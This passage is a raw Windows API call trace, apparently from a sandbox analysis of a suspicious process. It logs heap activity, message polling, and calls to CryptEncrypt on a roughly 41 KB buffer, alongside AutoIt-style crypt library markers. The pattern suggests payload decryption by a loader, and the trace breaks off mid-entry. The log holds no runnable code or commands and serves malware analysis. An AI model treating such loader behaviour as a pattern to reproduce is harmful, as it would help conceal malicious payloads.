RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0af) returned 0x2f28180 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0246.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.372] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0246.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.372] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0246.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.372] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.372] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.373] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0246.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.373] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.373] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0246.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.373] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0246.432] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0246.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.433] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0246.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0246.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.435] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0246.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.436] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa0af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa0b0) returned 1 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0246.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0246.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0246.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0246.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0246.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0246.441] CharLowerBuffW (in: lpsz="byte[41136]", cchLength=0xb | out: lpsz="byte[41136]") returned 0xb [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0246.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0246.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0246.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51478 [0246.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0246.448] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f32238*, pdwDataLen=0x8cef60*=0xa0af, dwBufLen=0xa0b0 | out: pbData=0x2f32238*, pdwDataLen=0x8cef60*=0xa0b0) returned 1 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0246.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0246.450] HeapFree (in: 